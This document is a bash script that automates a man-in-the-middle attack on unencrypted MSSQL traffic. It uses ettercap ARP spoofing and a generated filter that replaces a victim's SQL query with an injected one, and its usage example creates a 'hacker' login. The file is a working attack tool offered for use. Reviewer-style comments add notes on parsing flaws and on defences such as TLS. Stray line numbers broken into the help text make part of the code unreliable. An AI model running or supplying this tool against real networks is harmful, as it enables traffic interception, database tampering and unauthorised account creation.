#!/bin/bash
#
####################################################################
#
# Written by Rick Osgood
#
# This script is designed to automate the process of hijacking an
# MSSQL database connection. This script can be used to perform a
# MITM attack between two IP addresses using ettercap and ARP
# spoofing. You also submit an original SQL query and a new SQL
# query. The script will create, compile, and load an ettercap
# filter to replace the original SQL string with your new one.
# This should work on any MSSQL connection that is not encrypted.
#
####################################################################
args=("$@") #array to store command line arguments

# Set variable defaults
# "NULL" is a sentinel meaning "not supplied"; the checks that run after
# argument parsing compare against it, so the literal string NULL cannot be
# passed as a real value for these options.
SqlPort=1433 
ServerIP="NULL"
ClientIP="NULL"
FileName="NULL"
# Help function
print_help(){
27
        echo "Usage: ./SQLInject.sh -o [original SQL query] -i [new SQL query] -s [MSSQL Server IP] 
28
-c [SQL Client IP]"
29
        echo ""
30
        echo "Example: ./SQLInject.sh -o \"SELECT * from Products WHERE ProductID=1;\" -i \"CREATE L
31
OGIN hacker WITH PASSWORD=\"password01\";\" -s 10.0.1.20 -c 10.0.1.100"
32
        echo ""
33
        echo "This script creates an ettercap filter that will identify a SQL string"
34
        echo "and replace it with a new string. The script will then compile the filter"
35
        echo "and run ettercap with the filter loaded. Ettercap will perform an ARP"
36
        echo "spoofing attack against the specified IP addresses automatically. All you"
37
        echo "have to do is sit back and wait for the original query to be submitted."
38
        echo ""
39
        echo " --help"
40
        echo "     Show this message."
41
        echo " -o"
42
        echo "     Specify the original SQL string to be replaced."
43
        echo " -i"
44
        echo "     Specify the new SQL string to be injected. This string must not"
45
        echo "     longer than the original query string."
46
        echo " -s"
47
        echo "     Specify the MSSQL server IP for ARP poison attack. May also use gateway IP"
48
        echo " -c"
49
        echo "     Specify the SQL cient IP for ARP poison attack."
50
        echo " -f"
51
        echo "     Specify the output filename for the ettercap filter."
52
        echo " -p"
53
        echo "     Optional. Specifiy the MSSQL traffic port. Defaults to 1433."
54
}
# If not enough arguments then quit
# A coarse check only: the required -s/-c/-f values are validated after
# parsing, and -o/-i are never checked at all.
if [ $# -lt "4" ]; then
        print_help
        exit 1
fi
COUNTER=0 #Count from zero to number of arguments
# Manual option parser: walk the args array by index. Each value-taking
# option advances COUNTER once more so the following element is consumed
# as its value; an option given last with no value therefore reads past
# the end of the array and assigns an empty string. Values are not
# validated here (e.g. -p is not checked to be numeric).
while [ $COUNTER -lt $# ]; do
        if [ "${args[$COUNTER]}" == "--help" ]; then
                print_help
                exit 0

        elif [ "${args[$COUNTER]}" == "-o" ]; then
                COUNTER=$(($COUNTER+1))
                OldQuery=${args[$COUNTER]}

        elif [ "${args[$COUNTER]}" == "-i" ]; then
                COUNTER=$((COUNTER+1))
                NewQuery=${args[$COUNTER]}

        elif [ "${args[$COUNTER]}" == "-s" ]; then
                COUNTER=$((COUNTER+1))
                ServerIP=${args[$COUNTER]}

        elif [ "${args[$COUNTER]}" == "-c" ]; then
                COUNTER=$((COUNTER+1))
                ClientIP=${args[$COUNTER]}

        elif [ "${args[$COUNTER]}" == "-f" ]; then
                COUNTER=$((COUNTER+1))
                FileName=${args[$COUNTER]}

        elif [ "${args[$COUNTER]}" == "-p" ]; then
                COUNTER=$((COUNTER+1))
                SqlPort=${args[$COUNTER]}

        else
                # Anything else (including a stray value) aborts with the help text.
                echo "Error: Unknown argument \"${args[$COUNTER]}\""
                echo ""
                print_help
                exit 1
        fi

        # Advance past the option (or the value just consumed).
        COUNTER=$(($COUNTER+1))
done;
# Is anything missing?
# Only the three ettercap/filter parameters are required here; -o and -i are
# not checked, so an absent query is expanded as an empty string further on.
if [ "$ServerIP" == "NULL" ]; then
        echo "You must specify server IP!"
        exit 1

elif [ "$ClientIP" == "NULL" ]; then
        echo "You must specify client IP!"
        exit 1

elif [ "$FileName" == "NULL" ]; then
        echo "You must specify the file name for the ettercap filter!"
        exit 1
fi
# Calculate length of injected SQL query
# wc -m counts characters, including the newline echo appends, hence the -1.
# NOTE(review): $NewQuery is expanded unquoted, so the count is taken after
# the shell's word splitting and globbing rather than on the raw string.
length2=`echo $NewQuery | wc -m`
length2=$((length2 - 1))
echo "New string is $length2 bytes"

# Calculate length of original SQL query
# Same counting method (and the same unquoted expansion) as above.
length1=`echo $OldQuery | wc -m`
length1=$((length1 - 1))
echo "Original string is $length1 bytes"

# What's the difference?
difference=$((length1 - length2))
echo "Difference is $difference bytes"

# If the new string is too long it won't work
# (the replacement has to fit in the space taken by the original; the new
# query is space-padded up to that length afterwards). Note that this
# failure path exits with status 0.
if [ $difference -lt 0 ]; then
        echo ""
        echo "New SQL query is longer than original! Quitting..."
        exit 0
fi
temp=""
# Pad the new query with $difference spaces so it is exactly as long as the
# original (seq 1 0 prints nothing, so a zero difference adds no padding).
for i in `seq 1 $difference`;
do
        temp="$temp "
done
PaddedQuery="$NewQuery$temp"
echo "PaddedQuery is \"$PaddedQuery\""
echo ""
IFS=$'\n' # change separator to newline only. Required or the for loop skips spaces
# NOTE: IFS is never restored, so every later unquoted expansion in this
# script also splits on newline only.

echo "Converting original query to hex..."
# Convert original query to hex string with NULL padding (How it appears over the wire)
# sed emits one character per line; each character is hexdumped and its
# first byte appended as \xNN followed by \x00, building the escaped string
# that the ettercap filter's search()/replace() calls use.
OldQueryHex=""
for line in $(echo $OldQuery | sed -e 's/\(.\)/\1\n/g')
do
        OldQueryHex="$OldQueryHex\x"
        # hexdump -C: first output line, second double-space-separated field,
        # first token of that field == the first byte of the character
        temp=`echo $line | hexdump -C |head -n1 | awk -F"  " {'print $2'} | awk {'print $1'}`
        OldQueryHex="$OldQueryHex$temp"
        OldQueryHex="$OldQueryHex\x00"
done

echo "Converting new query to hex..."
# Convert new query to hex string now.
# Same per-character encoding as above, applied to the space-padded query so
# both escaped strings come out the same length.
NewQueryHex=""
for line in $(echo $PaddedQuery | sed -e 's/\(.\)/\1\n/g')
do
        NewQueryHex="$NewQueryHex\x"
        temp=`echo $line | hexdump -C |head -n1 | awk -F"  " {'print $2'} | awk {'print $1'}`
        NewQueryHex="$NewQueryHex$temp" 
        NewQueryHex="$NewQueryHex\x00"
done
echo "Writing ettercap filter now..."

# Start writing actual ettercap filter file
# The filter only inspects TCP segments whose destination port is $SqlPort
# and rewrites payload bytes in place. It can only match while the stream is
# plaintext, which is why enforcing TLS on the SQL server (and ARP-spoofing
# protections on the switch) defeats it. $FileName is expanded unquoted in
# every redirection below.
echo "if (ip.proto == TCP && tcp.dst == $SqlPort) {" > $FileName
echo "       msg(\"SQL traffic discovered\");" >> $FileName
echo "       if (search(DATA.data,\"$OldQueryHex\")) {" >> $FileName
echo "              msg(\"Found our string!\");" >> $FileName
echo "              replace(\"$OldQueryHex\",\"$NewQueryHex\");" >> $FileName
echo "              msg(\"...and replaced it :)\");" >> $FileName
echo "       }" >> $FileName
echo "}" >> $FileName

# Execute etterfilter to create the compiled filter
# Output goes to $FileName.ef next to the source filter; the exit status is
# not checked.
etterfilter $FileName -o $FileName.ef

# Execute ettercap and load the filter
# The success message below is printed regardless of the exit status of
# etterfilter or ettercap.
ettercap -T -q -F ./$FileName.ef -M ARP //$ServerIP// //$ClientIP//

echo ""
echo "Completed Successfully!"